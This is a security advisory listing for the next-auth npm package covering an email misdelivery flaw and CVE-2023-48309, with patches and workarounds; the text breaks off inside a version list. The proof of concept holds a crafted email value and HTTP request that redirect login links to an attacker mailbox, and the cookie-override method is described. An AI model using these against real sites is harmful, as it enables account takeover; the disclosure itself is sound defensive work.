NodeJS/next-auth/4.24.0
Authentication for Next.js
https://www.npmjs.com/package/next-auth
ISC
2 Security Vulnerabilities
NextAuthjs Email misdelivery Vulnerability
Published date: 2025-10-29T10:43:57Z
Links:
- https://github.com/nextauthjs/next-auth/security/advisories/GHSA-5jpx-9hw9-2fx4
- https://github.com/nextauthjs/next-auth/commit/82efcf81f218aae43683f8dd2f7c260ef69b3ece
- https://github.com/nextauthjs/next-auth/commit/8f3b2c7af0fe08973a12f616517c3ec85a5cd172
- https://github.com/advisories/GHSA-5jpx-9hw9-2fx4
Summary
NextAuth.js's email sign-in can be forced to deliver authentication emails to an attacker-controlled mailbox due to a bug in nodemailer's address parser used by the project (fixed in nodemailer v7.0.7). A crafted input such as:
"e@attacker.com"@victim.com
is parsed incorrectly and results in the message being delivered to e@attacker.com (attacker) instead of "<e@attacker.com>@victim.com" (the intended recipient at victim.com) in violation of RFC 5321/5322 semantics. This allows an attacker to receive login/verification links or other sensitive emails intended for the victim.
Affected NextAuthjs Version
| ≤ Version | Afftected |
|---|---|
| 4.24.11 | Yes |
| 5.0.0-beta.29 | Yes |
POC
Example Setup showing misdelivery of email
import NextAuth from "next-auth"
import Nodemailer from "next-auth/providers/nodemailer"
import { PrismaAdapter } from "@auth/prisma-adapter"
import { prisma } from "@/lib/prisma"
export const { handlers, auth, signIn, signOut } = NextAuth({
adapter: PrismaAdapter(prisma),
providers: [
Nodemailer({
server: {
host: "127.0.0.1",
port: 1025,
...
},
from: "noreply@authjs.dev",
}),
],
pages: {
signIn: '/auth/signin',
verifyRequest: '/auth/verify-request',
},
})
POST /api/auth/signin/nodemailer HTTP/1.1
Accept-Encoding: gzip, deflate, br, zstd
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 176
DNT: 1
Host: localhost:3000
Origin: http://localhost:3000
Pragma: no-cache
Referer: http://localhost:3000/auth/signin
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
accept: */*
accept-language: en-US,en;q=0.9,ta;q=0.8
content-type: application/x-www-form-urlencoded
sec-ch-ua: "Google Chrome";v="141", "Not?A_Brand";v="8", "Chromium";v="141"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
x-auth-return-redirect: 1
email=%22e%40attacker.coccm%22%40victim.com&csrfToken=90f5e6f48ab577ab011f212011862dcfe546459c23764cf891aab2d176f8d77a&callbackUrl=http%3A%2F%2Flocalhost%3A3000%2Fauth%2Fsignin
Mitigation
Update to nodemailer 7.0.7
Credits
https://zeropath.com/ Helped identify this security issue
Affected versions: ["5.0.0-beta.29", "5.0.0-beta.28", "5.0.0-beta.27", "5.0.0-beta.26", "5.0.0-beta.25", "5.0.0-beta.24", "5.0.0-beta.23", "5.0.0-beta.22", "5.0.0-beta.21", "5.0.0-beta.20", "5.0.0-beta.19", "5.0.0-beta.18", "5.0.0-beta.17", "5.0.0-beta.16", "5.0.0-beta.15", "5.0.0-beta.14", "5.0.0-beta.13", "5.0.0-beta.12", "5.0.0-beta.11", "5.0.0-beta.10", "5.0.0-beta.9", "5.0.0-beta.8", "5.0.0-beta.7", "5.0.0-beta.6", "5.0.0-beta.5", "5.0.0-beta.4", "5.0.0-beta.3", "5.0.0-beta.2", "5.0.0-beta.1", "5.0.0-beta.0", "4.24.11", "4.24.10", "4.24.9", "4.24.8", "4.24.7", "4.24.6", "4.24.5", "4.24.4", "4.24.3", "4.24.2", "4.24.1", "4.24.0", "4.23.2", "4.23.1", "4.23.0", "4.22.5", "4.22.4", "4.22.3", "4.22.2", "4.22.1", "4.22.0", "4.21.1", "4.21.0", "4.20.1", "4.20.0", "4.19.2", "4.19.1", "4.19.0", "4.18.10", "4.18.9", "4.18.8", "4.18.7", "4.18.6", "4.18.5", "4.18.4", "4.18.3", "4.18.2", "4.18.1", "4.18.0", "4.17.0", "4.16.4", "4.16.3", "4.16.2", "4.16.1", "4.16.0", "4.15.2", "4.15.1", "4.15.0", "4.14.0", "4.13.0", "4.12.3", "4.12.2", "4.12.1", "4.12.0", "4.11.0", "4.10.3", "4.10.2", "4.10.1", "4.10.0", "4.9.0", "4.8.0", "4.7.0", "4.6.1", "4.6.0", "4.5.0", "4.4.0", "4.3.4", "4.3.3", "4.3.2", "4.3.1", "4.3.0", "4.2.1", "4.2.0", "4.1.2", "4.1.1", "4.1.0", "4.1.0-next.2", "4.1.0-next.1", "4.0.6", "4.0.5", "4.0.4", "4.0.3", "4.0.2", "4.0.1", "4.0.0", "4.0.0-next.26", "4.0.0-next.25", "4.0.0-next.24", "4.0.0-next.23", "4.0.0-next.22", "4.0.0-next.21", "4.0.0-next.20", "4.0.0-next.19", "4.0.0-next.18", "4.0.0-next.17", "4.0.0-next.16", "4.0.0-next.15", "4.0.0-next.14", "4.0.0-next.13", "4.0.0-next.12", "4.0.0-next.11", "4.0.0-next.10", "4.0.0-next.9", "4.0.0-next.8", "4.0.0-next.7", "4.0.0-next.6", "4.0.0-next.5", "4.0.0-next.4", "4.0.0-next.3", "4.0.0-next.2", "4.0.0-next.1", "4.0.0-beta.7", "4.0.0-beta.6", "4.0.0-beta.5", "4.0.0-beta.4", "4.0.0-beta.3", "4.0.0-beta.2", "4.0.0-beta.1", "3.29.10", "3.29.9", "3.29.8", "3.29.7", "3.29.6", "3.29.5", "3.29.4", "3.29.3", "3.29.1", "3.29.0", "3.28.0", "3.27.3", "3.27.2", "3.27.1", "3.27.0", "3.26.1", "3.26.0", "3.25.0", "3.24.1", "3.24.0", "3.24.0-canary.0", "3.23.3", "3.23.2", "3.23.1", "3.23.0", "3.22.0", "3.22.0-canary.2", "3.22.0-canary.1", "3.22.0-canary.0", "3.21.1", "3.21.0", "3.20.1", "3.20.0", "3.20.0-canary.7", "3.20.0-canary.6", "3.20.0-canary.5", "3.20.0-canary.4", "3.20.0-canary.3", "3.20.0-canary.2", "3.20.0-canary.1", "3.20.0-canary.0", "3.19.8", "3.19.7", "3.19.6", "3.19.6-beta.0", "3.19.5", "3.19.5-beta.0", "3.19.4", "3.19.3", "3.19.2", "3.19.1", "3.19.0", "3.18.2", "3.18.1", "3.18.0", "3.18.0-canary.1", "3.18.0-canary.0", "3.17.2", "3.17.1", "3.17.0", "3.16.1", "3.16.0", "3.15.13", "3.15.12", "3.15.11", "3.15.10", "3.15.9", "3.15.8", "3.15.7", "3.15.6", "3.15.5", "3.15.4", "3.15.1", "3.15.0", "3.15.0-beta.4", "3.15.0-beta.3", "3.15.0-beta.2", "3.15.0-beta.1", "3.14.8", "3.14.7", "3.14.6", "3.14.5", "3.14.4", "3.14.3", "3.14.2", "3.14.1", "3.14.0", "3.14.0-beta.7", "3.14.0-beta.6", "3.14.0-beta.5", "3.14.0-beta.4", "3.14.0-beta.3", "3.14.0-beta.2", "3.14.0-beta.1", "3.14.0-canary.7", "3.14.0-canary.6", "3.14.0-canary.5", "3.14.0-canary.4", "3.14.0-canary.3", "3.14.0-canary.2", "3.14.0-canary.1", "3.14.0-canary.0", "3.13.3", "3.13.2", "3.13.1", "3.13.0", "3.12.0", "3.11.2", "3.11.1", "3.11.0", "3.10.1", "3.10.0", "3.9.0", "3.8.0", "3.7.1", "3.7.0", "3.6.1", "3.6.0", "3.5.1", "3.5.0", "3.4.2", "3.4.1", "3.4.0", "3.3.1", "3.3.0", "3.3.0-canary.11", "3.3.0-canary.10", "3.3.0-canary.9", "3.3.0-canary.8", "3.3.0-canary.7", "3.3.0-canary.6", "3.3.0-canary.5", "3.3.0-canary.4", "3.3.0-canary.3", "3.3.0-canary.2", "3.3.0-canary.1", "3.2.1", "3.2.0", "3.2.0-canary.43", "3.2.0-canary.42", "3.2.0-canary.41", "3.2.0-canary.40", "3.2.0-canary.39", "3.2.0-canary.38", "3.2.0-canary.37", "3.2.0-canary.36", "3.2.0-canary.35", "3.2.0-canary.34", "3.2.0-canary.33", "3.2.0-canary.32", "3.2.0-canary.31", "3.2.0-canary.30", "3.2.0-canary.29", "3.2.0-canary.28", "3.2.0-canary.27", "3.2.0-canary.26", "3.2.0-canary.25", "3.2.0-canary.24", "3.2.0-canary.23", "3.2.0-canary.22", "3.2.0-canary.21", "3.2.0-canary.20", "3.2.0-canary.19", "3.2.0-canary.18", "3.2.0-canary.17", "3.2.0-canary.16", "3.2.0-canary.15", "3.2.0-canary.14", "3.2.0-canary.13", "3.2.0-canary.12", "3.2.0-canary.11", "3.2.0-canary.10", "3.2.0-canary.9", "3.2.0-canary.8", "3.2.0-canary.7", "3.2.0-canary.6", "3.2.0-canary.5", "3.2.0-canary.4", "3.2.0-canary.3", "3.2.0-canary.2", "3.2.0-canary.1", "3.1.0", "3.0.1", "3.0.0", "3.0.0-beta.26", "3.0.0-beta.25", "3.0.0-beta.24", "3.0.0-beta.23", "3.0.0-beta.22", "3.0.0-beta.21", "3.0.0-beta.20", "3.0.0-beta.19", "3.0.0-beta.18", "3.0.0-beta.17", "3.0.0-beta.16", "3.0.0-beta.15", "3.0.0-beta.14", "3.0.0-beta.13", "3.0.0-beta.12", "3.0.0-beta.11", "3.0.0-beta.10", "3.0.0-beta.9", "3.0.0-beta.8", "3.0.0-beta.7", "3.0.0-beta.6", "3.0.0-beta.5", "3.0.0-beta.4", "3.0.0-beta.3", "3.0.0-beta.2", "3.0.0-beta.1", "3.0.0-beta.0", "2.2.1-beta.0", "2.2.0", "2.2.0-beta.0", "2.1.0", "2.1.0-beta.1", "2.1.0-beta.0", "2.0.1", "2.0.0", "2.0.0-beta.86", "2.0.0-beta.85", "2.0.0-beta.84", "2.0.0-beta.83", "2.0.0-beta.82", "2.0.0-beta.81", "2.0.0-beta.80", "2.0.0-beta.79", "2.0.0-beta.78", "2.0.0-beta.77", "2.0.0-beta.76", "2.0.0-beta.75", "2.0.0-beta.74", "2.0.0-beta.73", "2.0.0-beta.72", "2.0.0-beta.71", "2.0.0-beta.70", "2.0.0-beta.69", "2.0.0-beta.68", "2.0.0-beta.67", "2.0.0-beta.66", "2.0.0-beta.65", "2.0.0-beta.64", "2.0.0-beta.63", "2.0.0-beta.62", "2.0.0-beta.61", "2.0.0-beta.60", "2.0.0-beta.59", "2.0.0-beta.58", "2.0.0-beta.57", "2.0.0-beta.56", "2.0.0-beta.55", "2.0.0-beta.54", "2.0.0-beta.53", "2.0.0-beta.52", "2.0.0-beta.51", "2.0.0-beta.50", "2.0.0-beta.49", "2.0.0-beta.48", "2.0.0-beta.47", "2.0.0-beta.46", "2.0.0-beta.45", "2.0.0-beta.44", "2.0.0-beta.43", "2.0.0-beta.42", "2.0.0-beta.41", "2.0.0-beta.40", "2.0.0-beta.39", "2.0.0-beta.38", "2.0.0-beta.37", "2.0.0-beta.35", "2.0.0-beta.34", "2.0.0-beta.33", "2.0.0-beta.32", "2.0.0-beta.31", "2.0.0-beta.30", "2.0.0-beta.29", "2.0.0-beta.28", "2.0.0-beta.27", "2.0.0-beta.26", "2.0.0-beta.25", "2.0.0-beta.24", "2.0.0-beta.23", "2.0.0-beta.22", "2.0.0-beta.21", "2.0.0-beta.20", "2.0.0-beta.19", "2.0.0-beta.18", "2.0.0-beta.17", "2.0.0-beta.16", "2.0.0-beta.15", "2.0.0-beta.14", "2.0.0-beta.13", "2.0.0-beta.12", "2.0.0-beta.11", "2.0.0-beta.10", "2.0.0-beta.9", "2.0.0-beta.8", "2.0.0-beta.7", "2.0.0-beta.6", "2.0.0-beta.5", "2.0.0-beta.4", "2.0.0-beta.3", "2.0.0-beta.2", "2.0.0-beta.1", "2.0.0-beta.0", "1.12.1", "1.12.0", "1.11.0", "1.10.0", "1.9.1", "1.9.0", "1.8.5", "1.8.4", "1.8.3", "1.8.2", "1.8.1", "1.8.0", "1.7.3", "1.7.2", "1.7.1", "1.7.0", "1.6.0", "1.5.1", "1.5.0", "1.4.1", "1.4.0", "1.3.0", "1.2.1", "1.1.10", "1.1.9", "1.1.8", "1.1.7", "1.1.6", "1.1.5", "1.1.3", "1.1.2", "1.1.1", "1.1.0", "1.0.0", "0.0.0-pr.3101.63594048", "0.0.0-pr.3222.41318883", "0.0.0-pr.2683.26718028", "0.0.0-manual.20446898", "0.0.0-pr.6777.16422804", "0.0.0-pr.6777.c5550344", "0.0.0-pr.1698.f3995462", "0.0.0-pr.2875.e2663860", "0.0.0-pr.3143.b2273741", "0.0.0-pr.5657.4f991076", "0.0.0-pr.2857.9c439830", "0.0.0-manual.d0952342", "0.0.0-pr.2552.dd337147", "0.0.0-pr.2552.58d56122", "0.0.0-pr.2361.f72c6565", "0.0.0-pr.3657.c2de6348", "0.0.0-pr.2829.f0df4332", "0.0.0-pr.2214.ec1f3808", "0.0.0-pr.2857.8950d346", "0.0.0-pr.2552.ec27f344", "0.0.0-pr.2857.179d0314", "0.0.0-pr.3101.01cf0d98", "0.0.0-pr.2552.4d03c090", "0.0.0-pr.7056.f991df89", "0.0.0-pr.3143.367c8e88", "0.0.0-pr.2325.c9308d84", "0.0.0-pr.2361.f3784c70", "0.0.0-pr.5442.f1124f60", "0.0.0-pr.2884.7d74de57", "0.0.0-pr.2552.8de94d45", "0.0.0-pr.7056.1fefd037", "0.0.0-pr.2552.31684d31", "0.0.0-pr.5000.d742df31", "0.0.0-pr.2862.59712c27", "0.0.0-pr.3140.e6839f23", "0.0.0-pr.11562.ed0fce23", "0.0.0-pr.2518.f6892e15", "0.0.0-pr.2842.ccf36f15", "0.0.0-pr.3142.7d257c15", "0.0.0-pr.3307.e9e46c15", "0.0.0-pr.3657.56c042d8", "0.0.0-pr.3657.1ce622f7", "0.0.0-pr.6777.7f1745f6", "0.0.0-pr.2857.c98979e5", "0.0.0-pr.2932.3e8c32f4", "0.0.0-pr.3832.0245f6c4", "0.0.0-pr.4769.fc4d07d3", "0.0.0-pr.2900.3f27f1d2", "0.0.0-pr.3101.14f215f1", "0.0.0-pr.3657.433167c1", "0.0.0-pr.2214.f5461d1f", "0.0.0-pr.2236.76c76f8c", "0.0.0-pr.1698.d16e2ddc", "0.0.0-pr.2388.ce5443cf", "0.0.0-pr.2361.34ee1e9e", "0.0.0-pr.2552.01dc565f", "0.0.0-pr.2682.198c077f", "0.0.0-pr.2829.6e10635e", "0.0.0-pr.2857.8c54020d", "0.0.0-pr.2932.50df98dc", "0.0.0-pr.3101.54efdeff", "0.0.0-pr.3101.52507ff0", "0.0.0-pr.2875.e07f9f4e", "0.0.0-pr.3657.e822786c", "0.0.0-pr.5442.d62475d0", "0.0.0-pr.4769.4d126ded", "0.0.0-pr.5745.7387139f", "0.0.0-pr.4769.e8de64ec", "0.0.0-pr.5984.0593f75c", "0.0.0-pr.5991.5c72424c", "0.0.0-pr.6132.47cee00f", "0.0.0-pr.7214.4142955d", "0.0.0-pr.4760.0b190842", "0.0.0-pr.3886.65b88464", "0.0.0-pr.3101.5bf71011", "0.0.0-pr.4769.3ba67573", "0.0.0-pr.5792.6b041161", "0.0.0-pr.5802.b9d39079", "0.0.0-pr.4757.5ac99859", "0.0.0-pr.2552.f3ab7686", "0.0.0-pr.2552.90b06885", "0.0.0-pr.4760.bd6c5394", "0.0.0-pr.2361.bb96a914", "0.0.0-pr.4970.bffda880", "0.0.0-pr.3101.a0a0b745", "0.0.0-pr.5753.2b78e705", "0.0.0-pr.2361.b6d0d634", "0.0.0-pr.3402.be5db520", "0.0.0-pr.2388.9cbca279", "0.0.0-pr.2848.76fbc129", "0.0.0-pr.4841.8befe102", "0.0.0-pr.2295.231aeb99", "0.0.0-pr.2942.6db13e97", "0.0.0-manual.5749b095", "0.0.0-pr.4760.d7288b88", "0.0.0-pr.5536.126b3a88", "0.0.0-manual.d211b087", "0.0.0-manual.b7162c86", "0.0.0-pr.2236.a8bf7d85", "0.0.0-pr.2552.d1b14b85", "0.0.0-pr.4769.07ba2c72", "0.0.0-pr.3648.05a6bc62", "0.0.0-manual.c8300b61", "0.0.0-pr.2552.86b46d57", "0.0.0-pr.3402.5fb1fb51", "0.0.0-pr.2857.7b3cd038", "0.0.0-pr.2767.f9d46b34", "0.0.0-pr.3141.0a0bc030", "0.0.0-pr.2552.07b5be17", "0.0.0-pr.2682.10a4ba14", "0.0.0-pr.2980.c0b78cd9", "0.0.0-manual.722c34b9", "0.0.0-pr.1698.708f4bf8", "0.0.0-pr.2857.acc78bf8", "0.0.0-pr.3101.fb56f6e8", "0.0.0-pr.3101.8ff8bdb8", "0.0.0-manual.f2c23db8", "0.0.0-pr.2552.27134bf7", "0.0.0-pr.3657.4e42b8a7", "0.0.0-pr.7056.ced446b7", "0.0.0-manual.cfb42ae7", "0.0.0-pr.2552.cf147fb6", "0.0.0-pr.7056.c0e491b6", "0.0.0-manual.024ba3e6", "0.0.0-pr.3514.ebb48bc5", "0.0.0-pr.4769.4bfe67f4", "0.0.0-pr.2411.0f8b51b3", "0.0.0-manual.83c4ebd1", "0.0.0-pr.2361.beca4a3f", "0.0.0-pr.2361.ee80cbbc", "0.0.0-pr.2518.7bdfc7da", "0.0.0-pr.2552.ab7a548e", "0.0.0-pr.2552.691ac07b", "0.0.0-pr.2295.bb8bb1ad", "0.0.0-pr.2682.bb1972ba", "0.0.0-pr.2717.06130bef", "0.0.0-pr.2821.192d7c9b", "0.0.0-pr.2717.029b91cf", "0.0.0-pr.2857.b44ca26c", "0.0.0-pr.2857.3b0351cb", "0.0.0-pr.3188.f68451bc", "0.0.0-pr.3188.74bc611f", "0.0.0-pr.3101.f2dcbb5b", "0.0.0-pr.3402.16a9ebfc", "0.0.0-pr.3415.e9590dcb", "0.0.0-pr.3446.476d780b", "0.0.0-pr.3648.44003b1e", "0.0.0-pr.3657.4157bfde", "0.0.0-pr.3657.ce9386bb", "0.0.0-pr.3783.db8ceb0d", "0.0.0-pr.3657.d29a61eb", "0.0.0-pr.3657.ab442e4d", "0.0.0-pr.3799.b9241d4a", "0.0.0-pr.3804.dba9889e", "0.0.0-pr.4941.b97ce6de", "0.0.0-pr.5000.d16b25dc", "0.0.0-pr.5000.adbbf3df", "0.0.0-pr.5745.db70f12d", "0.0.0-pr.6007.2e864d9b", "0.0.0-pr.6004.b96e4fbf", "0.0.0-pr.7056.1fdbd15f", "0.0.0-manual.b53ca00b", "0.0.0-manual.27bcf0fe", "0.0.0-manual.4c69001b", "0.0.0-manual.dacbe24d", "0.0.0-pr.3217.87a21677", "0.0.0-manual.ffd05533", "0.0.0-pr.2552.4a2d5099", "0.0.0-pr.4704.768a1433", "0.0.0-pr.4774.a31ef368", "0.0.0-pr.2411.8ca1f299", "0.0.0-pr.3649.27d8aa99", "0.0.0-pr.3657.642da092", "0.0.0-pr.1698.16a0ea86", "0.0.0-manual.7f41a086", "0.0.0-pr.2361.2f293a83", "0.0.0-pr.3101.a410dc81", "0.0.0-pr.3307.80f2af80", "0.0.0-pr.5792.9119ea67", "0.0.0-pr.7056.4708af34", "0.0.0-pr.2236.34ce1a28", "0.0.0-pr.3657.f1addc18", "0.0.0-manual.2824fa11", "0.0.0-pr.4769.0a576d10", "0.0.0-pr.5442.0c96da09", "0.0.0-pr.2552.7af698f7", "0.0.0-pr.2552.735c10a7", "0.0.0-pr.2875.6dc651a7", "0.0.0-pr.3784.6c986ac7", "0.0.0-pr.3101.7983f7a6", "0.0.0-pr.3648.f1ad5ec6", "0.0.0-pr.5556.ac098ce6", "0.0.0-pr.2361.d70a43d5", "0.0.0-pr.2552.f73a37a5", "0.0.0-pr.4769.e7e82aa5", "0.0.0-manual.4cd21ea5", "0.0.0-manual.f414f2f5", "0.0.0-pr.5000.fa94eef4", "0.0.0-pr.2214.a71ac3f3", "0.0.0-pr.2361.46a85ea3", "0.0.0-pr.2256.d61437a2", "0.0.0-pr.3886.93a266e2", "0.0.0-semantically-released", "0.0.0-pr.2214.e085efae", "0.0.0-pr.2236.e9a1675e", "0.0.0-pr.2361.a780908a", "0.0.0-pr.2552.d227a1aa", "0.0.0-pr.2552.af41912d", "0.0.0-pr.2857.9a95448e", "0.0.0-pr.2857.5225a3ef", "0.0.0-pr.2857.5130374a", "0.0.0-pr.3100.1ae9acd0", "0.0.0-pr.3101.3d58a27e", "0.0.0-pr.3288.14260eda", "0.0.0-pr.4003.e7e3e60a", "0.0.0-pr.4760.fa6189ff", "0.0.0-pr.4940.437d4e8a", "0.0.0-pr.4926.25a4fa9f", "0.0.0-pr.4970.6ae1561c", "0.0.0-pr.5763.5e81d58a", "0.0.0-pr.6004.7d354a3a", "0.0.0-pr.6007.27c9acfe", "0.0.0-pr.6029.8f267aea", "0.0.0-pr.6777.faa4ea2a", "0.0.0-pr.6777.ae645ec0", "0.0.0-pr.7214.998286da", "0.0.0-manual.e65faa1c", "0.0.0-manual.68f7ce1c", "0.0.0-manual.c885ac1d", "0.0.0-pr.8775.a98a849e", "0.0.0-manual.7264de5f"]
Secure versions: [4.24.12, 4.24.13, 5.0.0-beta.30]
Recommendation: Update to version 4.24.13.
Possible user mocking that bypasses basic authentication
Published date: 2023-11-20T23:25:36Z
CVE: CVE-2023-48309
Links:
- https://github.com/nextauthjs/next-auth/security/advisories/GHSA-v64w-49xw-qq89
- https://nvd.nist.gov/vuln/detail/CVE-2023-48309
- https://github.com/nextauthjs/next-auth/commit/d237059b6d0cb868c041ba18b698e0cee20a2f10
- https://authjs.dev/guides/basics/role-based-access-control
- https://next-auth.js.org/configuration/nextjs#advanced-usage
- https://next-auth.js.org/configuration/nextjs#middlewar
- https://github.com/advisories/GHSA-v64w-49xw-qq89
Impact
next-auth applications prior to version 4.24.5 that rely on the default Middleware authorization are affected.
A bad actor could create an empty/mock user, by getting hold of a NextAuth.js-issued JWT from an interrupted OAuth sign-in flow (state, PKCE or nonce).
Manually overriding the next-auth.session-token cookie value with this non-related JWT would let the user simulate a logged in user, albeit having no user information associated with it. (The only property on this user is an opaque randomly generated string).
This vulnerability does not give access to other users' data, neither to resources that require proper authorization via scopes or other means. The created mock user has no information associated with it (ie. no name, email, access_token, etc.)
This vulnerability can be exploited by bad actors to peek at logged in user states (e.g. dashboard layout).
Note: Regardless of the vulnerability, the existence of a NextAuth.js session state can provide simple authentication, but not authorization in your applications. For role-based access control, you can check out our guide.
Patches
We patched the vulnerability in next-auth v4.24.5. To upgrade, run one of the following:
npm i next-auth@latest
yarn add next-auth@latest
pnpm add next-auth@latest
Workarounds
Upgrading to latest is the recommended way to fix this issue. However, using a custom authorization callback for Middleware, developers can manually do a basic authentication:
// middleware.ts
import { withAuth } from "next-auth/middleware"
export default withAuth(/*your middleware function*/, {
// checking the existence of any property - besides `value` which might be a random string - on the `token` object is sufficient to prevent this vulnerability
callbacks: { authorized: ({ token }) => !!token?.email }
})
References
Affected versions: ["4.24.4", "4.24.3", "4.24.2", "4.24.1", "4.24.0", "4.23.2", "4.23.1", "4.23.0", "4.22.5", "4.22.4", "4.22.3", "4.22.2", "4.22.1", "4.22.0", "4.21.1", "4.21.0", "4.20.1", "4.20.0", "4.19.2", "4.19.1", "4.19.0", "4.18.10", "4.18.9", "4.18.8", "4.18.7", "4.18.6", "4.18.5", "4.18.4", "4.18.3", "4.18.2", "4.18.1", "4.18.0", "4.17.0", "4.16.4", "4.16.3", "4.16.2", "4.16.1", "4.16.0", "4.15.2", "4.15.1", "4.15.0", "4.14.0", "4.13.0", "4.12.3", "4.12.2", "4.12.1", "4.12.0", "4.11.0", "4.10.3", "4.10.2", "4.10.1", "4.10.0", "4.9.0", "4.8.0", "4.7.0", "4.6.1", "4.6.0", "4.5.0", "4.4.0", "4.3.4", "4.3.3", "4.3.2", "4.3.1", "4.3.0", "4.2.1", "4.2.0", "4.1.2", "4.1.1", "4.1.0", "4.1.0-next.2", "4.1.0-next.1", "4.0.6", "4.0.5", "4.0.4", "4.0.3", "4.0.2", "4.0.1", "4.0.0", "4.0.0-next.26", "4.0.0-next.25", "4.0.0-next.24", "4.0.0-next.23", "4.0.0-next.22", "4.0.0-next.21", "4.0.0-next.20", "4.0.0-next.19", "4.0.0-next.18", "4.0.0-next.17", "4.0.0-next.16", "4.0.0-next.15", "4.0.0-next.14", "4.0.0-next.13", "4.0.0-next.12", "4.0.0-next.11", "4.0.0-next.10", "4.0.0-next.9", "4.0.0-next.8", "4.0.0-next.7", "4.0.0-next.6", "4.0.0-next.5", "4.0.0-next.4", "4.0.0-next.3", "4.0.0-next.2", "4.0.0-next.1", "4.0.0-beta.7", "4.0.0-beta.6", "4.0.0-beta.5", "4.0.0-beta.4", "4.0.0-beta.3", "4.0.0-beta.2", "4.0.0-beta.1", "3.29.10", "3.29.9", "3.29.8", "3.29.7", "3.29.6", "3.29.5", "3.29.4", "3.29.3", "3.29.1", "3.29.0", "3.28.0", "3.27.3", "3.27.2", "3.27.1", "3.27.0", "3.26.1", "3.26.0", "3.25.0", "3.24.1", "3.24.0", "3.24.0-canary.0", "3.23.3", "3.23.2", "3.23.1", "3.23.0", "3.22.0", "3.22.0-canary.2", "3.22.0-canary.1", "3.22.0-canary.0", "3.21.1", "3.21.0", "3.20.1", "3.20.0", "3.20.0-canary.7", "3.20.0-canary.6", "3.20.0-canary.5", "3.20.0-canary.4", "3.20.0-canary.3", "3.20.0-canary.2", "3.20.0-canary.1", "3.20.0-canary.0", "3.19.8", "3.19.7", "3.19.6", "3.19.6-beta.0", "3.19.5", "3.19.5-beta.0", "3.19.4", "3.19.3", "3.19.2", "3.19.1", "3.19.0", "3.18.2", "3.18.1", "3.18.0", "3.18.0-canary.1", "3.18.0-canary.0", "3.17.2", "3.17.1", "3.17.0", "3.16.1", "3.16.0", "3.15.13", "3.15.12", "3.15.11", "3.15.10", "3.15.9", "3.15.8", "3.15.7", "3.15.6", "3.15.5", "3.15.4", "3.15.1", "3.15.0", "3.15.0-beta.4", "3.15.0-beta.3", "3.15.0-beta.2", "3.15.0-beta.1", "3.14.8", "3.14.7", "3.14.6", "3.14.5", "3.14.4", "3.14.3", "3.14.2", "3.14.1", "3.14.0", "3.14.0-beta.7", "3.14.0-beta.6", "3.14.0-beta.5", "3.14.0-beta.4", "3.14.0-beta.3", "3.14.0-beta.2", "3.14.0-beta.1", "3.14.0-canary.7", "3.14.0-canary.6", "3.14.0-canary.5", "3.14.0-canary.4", "3.14.0-canary.3", "3.14.0-canary.2", "3.14.0-canary.1", "3.14.0-canary.0", "3.13.3", "3.13.2", "3.13.1", "3.13.0", "3.12.0", "3.11.2", "3.11.1", "3.11.0", "3.10.1", "3.10.0", "3.9.0", "3.8.0", "3.7.1", "3.7.0", "3.6.1", "3.6.0", "3.5.1", "3.5.0", "3.4.2", "3.4.1", "3.4.0", "3.3.1", "3.3.0", "3.3.0-canary.11", "3.3.0-canary.10", "3.3.0-canary.9", "3.3.0-canary.8", "3.3.0-canary.7", "3.3.0-canary.6", "3.3.0-canary.5", "3.3.0-canary.4", "3.3.0-canary.3", "3.3.0-canary.2", "3.3.0-canary.1", "3.2.1", "3.2.0", "3.2.0-canary.43", "3.2.0-canary.42", "3.2.0-canary.41", "3.2.0-canary.40", "3.2.0-canary.39", "3.2.0-canary.38", "3.2.0-canary.37", "3.2.0-canary.36", "3.2.0-canary.35", "3.2.0-canary.34", "3.2.0-canary.33", "3.2.0-canary.32", "3.2.0-canary.31", "3.2.0-canary.30", "3.2.0-canary.29", "3.2.0-canary.28", "3.2.0-canary.27", "3.2.0-canary.26", "3.2.0-canary.25", "3.2.0-canary.24", "3.2.0-canary.23", "3.2.0-canary.22", "3.2.0-canary.21", "3.2.0-canary.20", "3.2.0-canary.19", "3.2.0-canary.18", "3.2.0-canary.17", "3.2.0-canary.16", "3.2.0-canary.15", "3.2.0-canary.14", "3.2.0-canary.13", "3.2.0-canary.12", "3.2.0-canary.11", "3.2.0-canary.10", "3.2.0-canary.9", "3.2.0-canary.8", "3.2.0-canary.7", "3.2.0-canary.6", "3.2.0-canary.5", "3.2.0-canary.4", "3.2.0-canary.3", "3.2.0-canary.2", "3.2.0-canary.1", "3.1.0", "3.0.1", "3.0.0", "3.0.0-beta.26", "3.0.0-beta.25", "3.0.0-beta.24", "3.0.0-beta.23", "3.0.0-beta.22", "3.0.0-beta.21", "3.0.0-beta.20", "3.0.0-beta.19", "3.0.0-beta.18", "3.0.0-beta.17", "3.0.0-beta.16", "3.0.0-beta.15", "3.0.0-beta.14", "3.0.0-beta.13", "3.0.0-beta.12", "3.0.0-beta.11", "3.0.0-beta.10", "3.0.0-beta.9", "3.0.0-beta.8", "3.0.0-beta.7", "3.0.0-beta.6", "3.0.0-beta.5", "3.0.0-beta.4", "3.0.0-beta.3", "3.0.0-beta.2", "3.0.0-beta.1", "3.0.0-beta.0", "2.2.1-beta.0", "2.2.0", "2.2.0-beta.0", "2.1.0", "2.1.0-beta.1", "2.1.0-beta.0", "2.0.1", "2.0.0", "2.0.0-beta.86", "2.0.0-beta.85", "2.0.0-beta.84", "2.0.0-beta.83", "2.0.0-beta.82", "2.0.0-beta.81", "2.0.0-beta.80", "2.0.0-beta.79", "2.0.0-beta.78", "2.0.0-beta.77", "2.0.0-beta.76", "2.0.0-beta.75", "2.0.0-beta.74", "2.0.0-beta.73", "2.0.0-beta.72", "2.0.0-beta.71", "2.0.0-beta.70", "2.0.0-beta.69", "2.0.0-beta.68", "2.0.0-beta.67", "2.0.0-beta.66", "2.0.0-beta.65", "2.0.0-beta.64", "2.0.0-beta.63", "2.0.0-beta.62", "2.0.0-beta.61", "2.0.0-beta.60", "2.0.0-beta.59", "2.0.0-beta.58", "2.0.0-beta.57", "2.0.0-beta.56", "2.0.0-beta.55", "2.0.0-beta.54", "2.0.0-beta.53", "2.0.0-beta.52", "2.0.0-beta.51", "2.0.0-beta.50", "2.0.0-beta.49", "2.0.0-beta.48", "2.0.0-beta.47", 